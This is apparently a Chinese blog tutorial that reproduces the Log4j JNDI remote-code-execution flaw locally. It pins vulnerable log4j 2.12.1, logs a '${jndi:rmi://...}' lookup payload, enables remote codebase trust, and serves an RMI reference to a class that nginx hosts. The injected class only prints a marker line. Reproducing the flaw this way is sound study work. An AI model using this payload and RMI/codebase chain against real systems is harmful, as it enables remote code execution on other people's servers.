網上已經有大量資料講解了這個漏洞的成因和發展過程,本文主要記錄復現的實作過程
依賴:
<!-- Per the author, any log4j version below 2.15 works for this reproduction; 2.12.1 is pinned here.
     log4j-api provides the LogManager/Logger types the demo imports; log4j-core is the
     implementation artifact, so it is the one whose version decides whether the lookup behaviour is present. -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.12.1</version>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.12.1</version>
</dependency>
日志列印demo
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
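/**
 * Logging demo showing that, with the log4j-core version pinned on this page,
 * {@code ${...}} expressions are expanded even when they arrive as log
 * <em>parameters</em> rather than as part of the format string.
 *
 * <p>The sample output on the page shows {@code ${java:os}} replaced by the
 * operating-system description. The {@code ${jndi:rmi://...}} value stands in
 * for any untrusted text that reaches a log call; it is resolved against the
 * local RMI registry started by {@code RMIServer}.
 */
public class Log4jDemo {
    private static final Logger LOGGER = LogManager.getLogger();

    public Log4jDemo() {
    }

    /**
     * Enables remote codebase loading for JNDI, then logs three messages.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        // These two JDK switches allow JNDI object factories to be loaded from a
        // remote codebase URL. The demo sets them to "true" explicitly; current JDKs
        // are understood to default both to false (confirm for the JDK in use), so
        // the remote class load shown on this page depends on these two lines.
        // NOTE(review): the JDK default is defence in depth only; the page's own
        // boundary for the fix is the log4j version (below 2.15 reproduces).
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        try {
            // Stand-in for attacker-influenced text (a header, a user name, ...).
            String name = "${jndi:rmi://127.0.0.1:1099/test}";
            String os = "${java:os}";
            LOGGER.info("tanjunchen");
            // Parameter substitution happens first, then the lookup is expanded.
            LOGGER.info("tanjunchen {}", os);
            LOGGER.info("Hello attack,{}", name);
        } catch (Exception e) {
            // The original swallowed every exception here, hiding any failure of the
            // demo; report it the same way RMIServer does.
            e.printStackTrace();
        }
    }
}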
RMI
RMI(Remote Method Invocation)是 Java 的遠程方法呼叫協議;下面的程式在本機 1099 埠啟動一個 RMI 註冊表,供 Log4jDemo 中的 jndi:rmi 位址查詢
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import javax.naming.Reference;
/**
 * Local RMI registry used by the demo.
 *
 * <p>It binds a JNDI {@link Reference} under the name {@code test}. A client that
 * resolves {@code rmi://127.0.0.1:1099/test} receives that reference; whether the
 * client then fetches the named factory class from the codebase URL is decided
 * by the client JVM's {@code trustURLCodebase} settings, not by this server.
 */
public class RMIServer {
    public RMIServer() {
    }

    /**
     * Creates the registry on port 1099 and binds the reference.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        try {
            LocateRegistry.createRegistry(1099);
            Registry localRegistry = LocateRegistry.getRegistry();
            System.out.println("Local Registry RMI in 1099");
            // Arguments: class name, fully-qualified factory class name, and the
            // codebase URL (the local nginx instance described on this page).
            Reference factoryRef = new Reference("Test", "xxx.Test", "http://127.0.0.1:80/");
            // A Reference is not a remote object, so it is wrapped before binding.
            localRegistry.bind("test", new ReferenceWrapper(factoryRef));
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
Test 類
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;
/**
 * Marker object factory for the demo.
 *
 * <p>It only prints a fixed line (roughly "code has been injected") and returns
 * {@code null}. Seeing that line in the output of {@code Log4jDemo} is the
 * observable evidence that a class named by the RMI reference was instantiated
 * and called inside the logging process.
 */
public class Test implements ObjectFactory {
    // Printed verbatim; matches the last line of the run output shown on the page.
    private static final String MARKER = "--------被注入代碼了--------";

    /**
     * Prints the marker line and creates no object.
     *
     * @param obj         ignored
     * @param name        ignored
     * @param nameCtx     ignored
     * @param environment ignored
     * @return always {@code null}
     * @throws Exception declared by the interface; never thrown here
     */
    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment)
            throws Exception {
        System.out.println(MARKER);
        return null;
    }
}
將Test類編譯好后連同包名復制到nginx 檔案目錄下
nginx 下載地址:nginx: download

解壓后 使用 start nginx.exe 命令啟動即可
驗證nginx 是否啟動成功 瀏覽器輸入 http://127.0.0.1:80/

nginx 使用默認配置即可 config/nginx.conf

將class檔案連同包復制到html目錄下即可

先啟動 RMIServer,再啟動 Log4jDemo
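運行結果(最後一行由 Test 類的 getObjectInstance 輸出,表示 RMI 參照所指向的類別已在 Log4jDemo 的行程內被執行;這依賴 Log4jDemo 開頭把兩個 trustURLCodebase 屬性設為 true)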
17:43:21.409 [main] INFO com.mikeal.kafkatest.Log4jDemo - tanjunchen
17:43:21.409 [main] INFO com.mikeal.kafkatest.Log4jDemo - tanjunchen Windows 10 10.0, architecture: amd64-64
--------被注入代碼了--------
